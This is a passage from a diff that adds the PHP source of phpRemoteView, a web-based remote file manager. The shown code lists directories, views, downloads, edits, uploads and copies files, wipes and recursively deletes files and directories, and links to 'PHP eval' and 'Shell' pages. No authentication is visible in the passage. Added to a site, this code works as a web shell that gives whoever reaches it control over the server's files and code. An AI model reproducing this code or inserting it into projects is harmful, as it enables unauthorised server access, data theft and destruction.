$found=0; + foreach ($ext as $kk=>$vv) { + if (in_array(strtolower($fext[$k]),$vv)) { + $ln.='<img src='.$self.'?c=img&name='.$kk.' border=0>'; + $found=1; + break; + } + } + if (!$found) + $ln.='<img src='.$self.'?c=img&name=unk border=0>'; + } + $ln.=substr($k,0,48).'</a>'; + echo jsval($ln); + + break; + + case "t": + switch ($ftype[$k]) { + case "dir": + echo jsval("<a href=$self?c=d&d=".urlencode($d.$k).">DIR</a>"); + break; + case "file": + echo jsval("<a href=$self/".urlencode($k)."?&c=v&fnot=1&ftype=3&d=". + urlencode($d)."&f=".urlencode($k)." class=sym>\xF2</a> ". 
+ "<a href=$self?&c=i&d=".urlencode($d)."&f=".urlencode($k)." class=sym>\xF0</a>"); + break; + case "link": + echo jsval("<font class=t>&#8212;&gt;</font>"); + break; + default: + echo jsval("??"); + break; + } + break; + + case "s": + if ($ftype[$k]=='file') echo jsval(sizeparse($fsize[$k])); + else echo jsval(''); + break; + + case "o": + $tmp=@_posix_getpwuid($fowner[$k]); + if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k]; + else $tow=$tmp['name']; + echo jsval($tow); + break; + + case "g": + $tmp2=@_posix_getgrgid($fgroup[$k]); + if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k]; + else $tgr=$tmp2['name']; + echo jsval($tgr); + break; + + case "a": + $tmp=@_posix_getpwuid($fowner[$k]); + if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k]; + else $tow=$tmp['name']; + $tmp2=@_posix_getgrgid($fgroup[$k]); + if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k]; + else $tgr=$tmp2['name']; + echo jsval("$tow/$tgr"); + break; + + case "c": + echo jsval(display_perms($fperms[$k])); break; + + case "1": echo jsval(date($cp[2],$fctime[$k])); break; + + case "2": echo jsval(date($cp[2],$fmtime[$k])); break; + + case "3": echo jsval(date($cp[2],$fatime[$k])); break; + + default: echo "??$cn[$i]??"; + + } //switch ($ftype) + + }//for ($cn) + + echo "0);\n"; + + }//foreach ($names) + + echo "\n\n</script>\n\n\n"; + + echo '</td></tr></table></td></tr></table></td></tr></table>'; + + + echo "<P align=center> + <font size=1 style='Font: 8pt Verdana'><B> + <a href=$self?c=setup&ref=$uurl>".mm("Setup")."</a> | + <a href=$self?c=t>PHP eval</a> | + <a href=$self?c=phpinfo>phpinfo()</a> | + <a href=$self?c=t>Shell</a> | + <a href=$self?c=codes>".mm("Char map")."</a> | + ".mm("Language").": + <a href=$self?c=set&c2=eng&ref=$uurl&pan=0>".mm("English")."</a>/<a href=$self?c=set&c2=rus&ref=$uurl&pan=0>".mm("Russian")."</a> + + </b> + <hr size=1 noshade width=55%><center> + + <table border=0 cellspacing=0 cellpadding=0><tr><td 
width=32>
+ <font face=webdings style='Font-size: 22pt;'>&#0033;</font></td><td>
+ <font size=1 style='Font: 8pt Verdana'>phpRemoteView &copy; Dmitry Borodin (".mm("version")." $version)<br>
+ ".mm("Free download")." - <a href='http://php.spb.ru/remview/'>http://php.spb.ru/remview/</a></b></font></td>
+ </tr></table>";
+
+break;
+
+
+case "set":
+
+ switch ($c2) {
+ case "sort":
+ $name=intval($name);
+ if ($name==$cc[0]) if ($cc[1]==='0') $cc[1]='1'; else $cc[1]='0';
+ $cc[0]=$name;
+ break;
+
+ case "panel":
+ $cn='';
+ foreach ($names as $k=>$v) {
+ if ($v!="") $cn.=substr($v,0,1);
+ }
+ $cc[0]=substr($sort,0,1);
+ $cc[1]=substr($sortby,0,1);
+ $cp[2]=substr($datetime,0,50);
+ $cp[3]=substr($fontname,0,50);
+ $cp[4]=substr($fontsize,0,50);
+
+ //exit("cn=$cn<br>cc=$cc");
+ break;
+
+ case "eng":
+ $cc[5]=1;
+ break;
+
+ case "rus":
+ $cc[5]=2;
+ break;
+
+ }
+
+
+ $cookie=$cc."~".$cn."~".$cp[2]."~".$cp[3]."~".$cp[4];
+ if ($c2=="reset") $cookie=implode("~",$cp_def);
+ //echo "<script>alert('$cookie')</script>";
+ setcookie("cp$pan",$cookie,time()+24*60*60*333,'/');
+ header("Location: $ref");
+ echo "<script>location.href=\"$ref\";</script>";
+ //echo "[$ref]";
+ //phpinfo();
+ break;
+
+
+case "setup":
+
+ echo $GLOBALS['html'];
+
+ echo "<center><h3><b>phpRemoteView ".mm("setup")."</b> [<A href='javascript:history.go(-1)'>".mm("back")."</a>]</h3></center><hr size=1 noshade>";
+
+ echo "<STYLE>
+ .setup {
+ font-size: 8pt;
+ font-family: Tahoma;
+ }
+ HTML, TD {font: 90%}
+ </STYLE>";
+
+ echo "
+ <b><u>".mm("Reset all settings")."</u></b>: <a href=$self?c=set&c2=reset&pan=$panel&ref=$ref>".mm("clear")."</a>";
+ echo " <font color=white>(".mm("Current").": <small>".implode(" | ",$cp)."</small>)</font><P>";
+
+ echo "
+ <form action=$self method=post>
+ <input type=hidden name=c value=\"set\">
+ <input type=hidden name=c2 value=\"panel\">
+ <input type=hidden name=pan value=\"$panel\">
+ <input type=hidden name=ref value=\"$ref\">
+ ";
+ echo "<b><u>".mm("Colums
and sort")."</u></b><br>";
+
+ echo "".mm("Sort order").": ";
+ echo "<input type=radio name=sortby value=0 id=q3 ".($cc[1]=='0'?"checked":"").">";
+ echo "<label for=q3>".mm("Ascending sort")."</label>";
+ echo "<input type=radio name=sortby value=1 id=q4 ".($cc[1]=='1'?"checked":"").">";
+ echo "<label for=q4>".mm("Descending sort")."</label><br>";
+
+ echo "<input type=radio name=sort value='n' id=q1 ".($cc[0]=='n'?"checked":"").">";
+ echo "<label for=q1>".mm("Sort by filename")."</label>";
+ echo "<input type=radio name=sort value='e' id=q2 ".($cc[0]=='e'?"checked":"").">";
+ echo "<label for=q2>".mm("Sort by filename extension")."</label>";
+ echo "<table border=0 cellspacing=0 cellpadding=3>";
+ for ($i=0; $i<2; $i++) {
+ echo "<tr>";
+ for ($j=0; $j<7; $j++) {
+ $n=$j+$i*7;
+ echo "<td align=center><label for=$n>Sort by ".($n+1)."</label>";
+ echo "<input type=radio name=sort value=$n id=$n ".($cc[0]=="$n"?"checked":"").">";
+ echo "<br><select class=setup name=names[] size=".(count($cn_name)+1).">";
+ echo "<option value=''>--hidden--";
+ foreach ($cn_name as $kk=>$vv)
+ echo "<option value='$kk'".($n<strlen($cn) && $cn[$n]==$kk?"
selected":"").">$vv";
+ echo "</select>";
+ }
+ echo "</tr>";
+ }
+ echo "</table><P>";
+
+ echo "<b><u>".mm("Date/time format")."</u></b>: <input type=text name=datetime value=\"$cp[2]\"><br>
+ d - day, m - month, y - year2, Y - year4, H - hour, m - minute, s - second<P>";
+
+ echo "<b><u>".mm("Panel font & size")."</u></b>:
+ <input type=text name=fontname value=\"$cp[3]\" size=12>
+ <input type=text name=fontsize value=\"$cp[4]\" size=2>pt<P>";
+
+ echo "<P><center><input type=submit value='&nbsp; &nbsp; S &nbsp; U &nbsp; B &nbsp; M &nbsp; I &nbsp; T &nbsp; &nbsp;'></center></form>";
+
+
+ echo "<hr size=1 noshade>";
+ break;
+
+
+
+// view
+case "v":
+
+
+ if (!isset($fnot)) $fnot=0;
+ if (!isset($ftype)) $ftype=0;
+
+ if ($fnot==0) {
+ echo $GLOBALS['html'];
+ up($d,$f);
+ echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+ up_link($d,$f);
+ echo "<hr size=1 noshade>";
+ }
+ if (!realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+ if (!is_file($d.$f) || !$fi=@fopen($d.$f,"rb")) exit("<p><font color=red><b>".mm("access denied")."</b></font>");
+
+ if ($ftype==0 || $ftype==4) {
+ $buf=fread($fi,max(filesize($d.$f),$maxsize_fread));
+ fclose($fi);
+ }
+
+
+ switch ($ftype) {
+
+ case 0:
+ echo "<pre>".htmlspecialchars($buf)."</pre>";
+ break;
+
+ case 1:
+ readfile($d.$f);
+ break;
+
+ case 2:
+ header("Content-type: image/gif");
+ readfile($d.$f);
+ break;
+
+ case 3: // download
+
+ if (isset($fatt) && strlen($fatt)>0) {
+ $attach=$fatt;
+ header("Content-type: text/plain");
+ }
+ else {
+ $attach=$f;
+ header("Content-type: phpspbru");
+ }
+ header("Content-disposition: attachment; filename=\"$attach\";");
+ readfile($d.$f);
+ break;
+
+ case 4: // session
+
+ echo "<xmp>";
+ if (substr($f,0,5)=="sess_" && preg_match("!^sess_([a-z0-9]{32})$!i",$f,$ok)) {
+ ini_set("session.save_path",$d);
+ session_id($ok[1]);
+ session_start();
+ print_r($HTTP_SESSION_VARS);
+ }
+ else {
+ print_r(unserialize($buf));
+ }
+ echo "</xmp>";//<hr size=1 noshade><xmp>";
+ break;
+
+ }
+
+ break;
+
+
+
+
+
+
+
+case "i": // information for FILE
+
+ echo $GLOBALS['html'];
+ up($d,$f);
+ echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+ up_link($d,$f);
+
+ if (!realpath($d.$f) || !file_exists($d.$f)) exit(mm("file not found"));
+
+ echo "<P><big><b><tt>".htmlspecialchars($d.$f)."</tt></b></big><P>";
+ echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+ echo "<tr class=tr><td>".mm("Size")." </td><td> ".filesize($d.$f)."</td></tR>";
+ echo "<tr class=tr><td>".mm("Owner")."/".mm("Group")." </td><td> ";
+ $tmp=@_posix_getpwuid(fileowner($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+ else echo $tmp['name']." ";
+ $tmp=@_posix_getgrgid(filegroup($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+ else echo $tmp['name'];
+ echo "<tr class=tr><td>".mm("FileType")." </td><td> ".filetype($d.$f)."</td></tr>";
+ echo "<tr class=tr><td>".mm("Perms")." </td><td> ".display_perms(fileperms($d.$f))."</td></tr>";
+ echo "<tr class=tr><td>".mm("Create time")." </td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+ echo "<tr class=tr><td>".mm("Access time")." </td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+ echo "<tr class=tr><td>".mm("MODIFY time")." </td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+ echo "</table><P>";
+
+ $fi=@fopen($d.$f,"rb");
+ if ($fi) {
+ $str=fread($fi,$hexdump_lines*$hexdump_rows);
+ echo "<b>".mm("HEXDUMP PREVIEW")."</b>";
+ $n=0;
+ $a0="00000000<br>";
+ $a1="";
+ $a2="";
+ for ($i=0; $i<strlen($str); $i++) {
+ $a1.=sprintf("%02X",ord($str[$i])).'
';
+ switch (ord($str[$i])) {
+ case 0: $a2.="<font class=s2>0</font>"; break;
+ case 32:
+ case 10:
+ case 13: $a2.="&nbsp;"; break;
+ default: $a2.=htmlspecialchars($str[$i]);
+ }
+ $n++;
+ if ($n==$hexdump_rows) {
+ $n=0;
+ if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>";
+ $a1.="<br>";
+ $a2.="<br>";
+ }
+ }
+ //if ($a1!="") $a0.=sprintf("%08X",$i)."<br>";
+ echo "<table border=0 bgcolor=#cccccc cellspacing=1 cellpadding=4 ".
+ "class=sy><tr><td bgcolor=#e0e0e0>$a0</td><td bgcolor=white>".
+ "$a1</td><td bgcolor=white>$a2</td></tr></table><p>";
+ }
+
+ echo "<b>Base64: </b>
+ <nobr>[<a href=$self?c=base64&c2=0&d=".urlencode($d)."&f=".urlencode($f).">Encode</a>]&nbsp;</nobr>
+ <nobr>[<a href=$self?c=base64&c2=1&d=".urlencode($d)."&f=".urlencode($f).">+chunk</a>]&nbsp;</nobr>
+ <nobr>[<a href=$self?c=base64&c2=2&d=".urlencode($d)."&f=".urlencode($f).">+chunk+quotes</a>]&nbsp;</nobr>
+ <nobr>[<a href=$self?c=base64&c2=3&d=".urlencode($d)."&f=".urlencode($f).">Decode</a>]&nbsp;</nobr>
+ <P>";
+
+
+ if (!$write_access) exitw();
+
+ $msg="";
+ if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS")."</b></font>)";
+ else fclose($fi);
+ if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied")."</b></font>)";
+ else fclose($fi);
+ if ($msg=="") $msg=" (".mm("full read/write access").")";
+
+ echo "<b>".mm("FILE SYSTEM COMMANDS")."$msg</b><p>";
+
+ echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td bgcolor=#cccccc><a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f).
+"><b>&nbsp;&nbsp;".mm("EDIT")."&nbsp;&nbsp;<br>&nbsp;&nbsp;".mm("FILE")."&nbsp;&nbsp;</b></a></td>
+<td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=delete>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("DELETE")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Delete this file")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=clean>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("CLEAN")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("filesize to 0byte")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=touch>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("TOUCH")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("Set current 'mtime'")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=wipe>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("WIPE(delete)")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Write '0000..'
and delete")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+</tr></table>
+";
+
+ echo "<form action=$self method=post><input type=hidden name=c value=copy>".
+ "<b>".mm("COPY FILE")."</b> ".mm("from")." <input type=text size=40 name=from value=\"".htmlspecialchars($d.$f)."\">".
+ " ".mm("to")." <input type=text name=to size=40 value=\"".htmlspecialchars($d.$f)."\">".
+ "<nobr><input type=submit value='".mm("COPY")."!'>".
+ "&gt;<input type=checkbox name=confirm value=copy></nobr></form>";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (".mm("type full path").")
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d.$f)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>FILE UPLOAD: ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").":
+ <input name=df size=50 value=\"$d$f\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+ <label for=df2>".mm("create file name automatic")."</label>
+ &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+ ".mm("type any file name").":
+ <input name=df3 size=20><br>
+4.
<input type=checkbox name=df4 value=1 id=df4>
+ <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+break;
+
+
+case "base64":
+
+ echo "<pre>\n";
+ $ff=fopen($d.$f,"rb") or exit("<p>access denied");
+ $text=fread($ff,max(filesize($d.$f),$maxsize_fread));
+ fclose($ff);
+ switch ($c2) {
+ case 0:
+ echo base64_encode($text);
+ break;
+ case 1:
+ echo chunk_split(base64_encode($text));
+ break;
+ case 2:
+ $text=base64_encode($text);
+ echo substr(preg_replace("!.{1,76}!","'\\0'.\n",$text),0,-2);
+ break;
+ case 3:
+ echo base64_decode($text);
+ break;
+ }
+ break;
+
+
+
+case "d": // information for DIRECTORY
+
+ echo $GLOBALS['html'];
+ up($d,"","Directory");
+ echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+ echo "<p>";
+
+ //up_link($d,"");
+
+ if (!realpath($d) || !is_dir($d.$f)) exit(mm("dir not found"));
+
+ echo "<table border=0 cellspacing=0 cellpadding=0><tr><td>";
+
+ echo "<table border=0 cellspacing=1 cellpadding=1 class=tab>";
+ echo "<tr class=tr><td>&nbsp;&nbsp;&nbsp;".mm("Owner")."/".mm("Group")."&nbsp;&nbsp;&nbsp;</td><td>";
+ $tmp=@_posix_getpwuid(fileowner($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+ else echo $tmp['name']."
";
+ $tmp=@_posix_getgrgid(filegroup($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+ else echo $tmp['name'];
+ echo "</td></tr><tr class=tr><td>";
+ echo mm("Perms")."</td><td>".display_perms(fileperms($d.$f))."</td></tr><tr class=tr><td>";
+ echo mm("Create time")."</td><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr class=tr><td>";
+ echo mm("Access time")."</td><td>".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr class=tr><td>";
+ echo mm("MODIFY time")."</td><td>".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+
+ echo "</tD><form action=$self method=get><td width=70>&nbsp;</td><td>
+ <input type=hidden name=c value=\"tree\">
+ Root <input type=text name=d value=\"$d\"><br>
+ <input type=checkbox name=showfile value=1 id=tree1><label for=tree1>Show files in tree</label><br>
+ <input type=checkbox name=showsize value=1 id=tree2 checked><label for=tree2>Show dir/files size</label><br>
+ <input type=submit value='Show TREE directory'>";
+
+ echo "</td></form></tr></table><P>";
+
+
+
+ if (!$write_access) exitw();
+
+ echo "<b>".mm("FILE SYSTEM COMMANDS")."</b><p>";
+
+ echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=files>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all files in dir")." (rm *)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=dir>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all dir/files recursive")."
(rm -fr)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+</tr></table>
+";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (type full path)
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>(FILE UPLOAD) ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").":
+ <input name=df size=50 value=\"".realpath($d)."/\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+ <label for=df2>".mm("create file name automatic")."</label>
+ &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+ ".mm("type any file name").":
+ <input name=df3 size=20><br>
+4.
<input type=checkbox name=df4 value=1 id=df4>
+ <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+
+break;
+
+
+
+case "tree":
+
+$tcolors=array(
+'eee','ddd','ccc','bbb','aaa','999','888','988','a88','b88','c88','d88','e88','d98',
+'ca8','bb8','ac8','9d8','8e8','8d9','8ca','8bb','8ac','89d','88e');
+
+function dir_tree($df,$level=0) {
+ global $tcolors,$self;
+
+ $df=str_replace("//","/",$df);
+ $dirs=array();
+ $files=array();
+ if ($dir=opendir($df)) {
+ while (($file=readdir($dir))!==false) {
+ if ($file=="." || $file=="..") continue;
+ if (is_dir("$df/$file")) {
+ $dirs[]=$file;
+ }
+ else {
+ $files[]=$file;
+ }
+ }
+ }
+ closedir($dir);
+
+ sort($dirs);
+ sort($files);
+
+ $i=min($level,count($tcolors)-1);
+ $c=$tcolors[$i][0].$tcolors[$i][0].$tcolors[$i][1].$tcolors[$i][1].$tcolors[$i][2].$tcolors[$i][2];
+
+ echo "\r\n\r\n\r\n
+ <table width=100% border=0 cellspacing=2 cellpadding=1><tr><td bgcolor=#000000>
+ <table width=100% border=0 cellspacing=0 cellpadding=1 bgcolor=#$c>
+ <tr><td colspan=3 class=dir>".
+ "<a href=$self?c=l&d=".urlencode($df)." class=dir><img src=$self?name=dir&c=img&1 border=0>".
+ $df."</a></td></tr>";
+
+ if (count($dirs) || count($files)) {
+ echo "<tr><td width=15>&nbsp;</td><td class=all width=97%>";
+ for ($i=0; $i<count($files); $i++) {
+ echo $files[$i]."
";
+ }
+ for ($i=0; $i<count($dirs); $i++) {
+ dir_tree($df."/".$dirs[$i],$level+1);
+ }
+ echo "</td><td width=10>&nbsp;</td></tr>";
+ }
+ echo '</table></td></tr></table>';
+}
+
+ echo "
+ <STYLE>
+ .all {
+ font-family: Verdana;
+ font-size: 80%;
+ }
+ .dir {
+ font-family: Verdana;
+ font-size: 95%;
+ background: #666699;
+ font-weight: bold;
+ color: white
+ }
+ </STYLE>";
+ echo $GLOBALS['html'];
+
+ up($d,"","Directory");
+ echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+ echo "<p>";
+ dir_tree($d);
+ break;
+
+
+
+case "delete":
+
+ if (!$write_access) exitw();
+
+ if (!isset($c2)) exit("err# delete 1");
+ if (!isset($confirm) || strlen($confirm)<3) exit("".mm("Confirm not found (go back and set checkbox)")."");
+ echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a><p>";
+ if (!isset($d) || !isset($f) || !@file_exists($d.$f) || !@realpath($d.$f))
+ exit("".mm("Delete cancel - File not found")."");
+ if (realpath(getenv("SCRIPT_FILENAME"))==$d.$f && !isset($delete_remview_confirm))
+ exit(mm("Do you want delete this script (phpRemoteView) ???")."<br><br><br><br>
+ <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".urlencode($f)."&delete_remview_confirm=YES'>[".mm("YES").", ".mm("DELETE")." <b>".mm("ME")."</b>]</a>
+ &nbsp; &nbsp; &nbsp;
+ <a href='javascript:history.back(-1)'>[".mm("NO (back)")."]</a>");
+
+ switch ($c2) {
+ case "delete":
+ //exit("$d $f");
+ ob();
+ if (!unlink($d.$f))
+ obb().exit("<font color=red><b>".mm("Delete cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb");
+ Header("Location: $self?c=l&d=".urlencode($d));
+ echo "<P><a href=$self?c=l&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+ echo "".mm("Delete ok")."";
+ break;
+ case "touch":
+ ob();
+ if (!touch($d.$f))
+ obb().exit("<font color=red><b>".mm("Touch cancel")."
- ".mm("ACCESS DENIED")."</b></font>$obb");
+ Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+ echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+ echo "".mm("Touch ok (set current time to 'modify time')")."";
+ break;
+ case "clean":
+ ob();
+ $fi=fopen($d.$f,"w+") or
+ obb().exit("<font color=red><b>".mm("Clean (empty file) cancel")." - ".mm("ACCESS DENIED")."</b></font>obb");
+ ftruncate($fi,0);
+ fclose($fi);
+ Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+ echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+ echo "".mm("Clean ok (file now empty)")."";
+ break;
+ case "wipe":
+ $size=filesize($d.$f);
+ ob();
+ $fi=fopen($d.$f,"w+") or
+ obb().exit("<font color=red><b>".mm("Wipe cancel - access denied")."</b></font>$obb");
+ $str=md5("phpspbru".mt_rand(0,999999999).time());
+ for ($i=0; $i<5; $i++) $str.=$str; // strlen 1024 byte
+ for ($i=0; $i<intval($size/1024)+1; $i++) fwrite($fi,$str);
+ fclose($fi);
+ ob();
+ if (!unlink($d.$f))
+ obb().exit("err# delete 2 - file was rewrite, but not delete...(only write access, delete disable)$obb");
+ Header("Location: $self?c=l&d=".urlencode($d));
+ echo "<a href=$self?c=i&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+ echo "".mm("Wipe ok (file deleted)")."";
+ break;
+ }
+
+ //Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+ //echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+
+ break;
+
+
+case "dirdelete":
+
+ if (!$write_access) exitw();
+
+function dir_delete($df) {
+ echo "<b>".basename($df)."</b><ul>";
+ if ($dir=opendir($df)) {
+ $i=0;
+ while (($file=readdir($dir))!==false) {
+ if ($file=="." || $file=="..") continue;
+ if (is_dir("$df/$file")) {
+ dir_delete($df."/".$file);
+ }
+ else {
+ echo "$file<br>";
+ echo "".mm("DELETE")."
<tt>$df/$file</tt> ...<br>";
+ unlink($df."/".$file);
+ }
+ $i++;
+ }
+ //if ($i==0) echo "-empty-<br>";
+ }
+ closedir($dir);
+ echo "</ul>";
+ echo "".mm("DELETE")." ".mm("DIR")." <tt>$df</tt> ...<br>";
+ rmdir("$df/$file");
+}
+
+ if (!isset($c2)) exit("error dirdelete 1");
+ if (!isset($confirm)) exit("".mm("Confirm not found (go back and set checkbox)")."!");
+ $df="$d";
+
+ switch ($c2) {
+
+ case "files":
+ echo "<h3>".mm("Deleting all files in")." <tt>$df</tt> ...</h3>";
+ if ($dir=opendir($df)) {
+ while (($file=readdir($dir))!==false) {
+ if ($file=="." || $file=="..") continue;
+ if (is_dir($df.$file)) {
+ echo "<big><tt><b>>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+ }
+ elseif (is_file($df.$file)) {
+ echo "<big><tt><b><font color=red>$file</font></b></tt></big> ".mm("deleting")."...";
+ unlink($df.$file);
+ echo "<br>";
+ }
+ else {
+ echo "<big><tt><b>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+ }
+ }
+ }
+ closedir($dir);
+ $ref="$self?c=l&d=".urlencode($d);
+ break;
+
+ case "dir":
+ echo "<h3>".mm("Deleting all dir/files (recursive) in")."
<tt>$df</tt> ...</h3>";
+ dir_delete($df);
+ $ref="$self?c=l&d=".urlencode(realpath($d."/.."));
+ break;
+ }
+ //header("Location: $ref");
+ echo "<p><a href=$ref>".mm("DONE, go back")."</a>";
+ break;
+
+case "copy":
+
+ if (!$write_access) exitw();
+
+ if (!isset($from) || !@file_exists($from) || !@realpath($from))
+ exit("err# copy 1, file [$from] not found");
+ if (!isset($to) || strlen($to)==0)
+ exit("err# copy 2, file [$to] not found");
+ echo "Copy: ....<hr size=1 noshade>";
+ if (!copy($from,$to)) {
+ echo "<hr size=1 noshade><font color=red><b>Error!</b></font><p>";
+ echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."<p>";
+ }
+ else
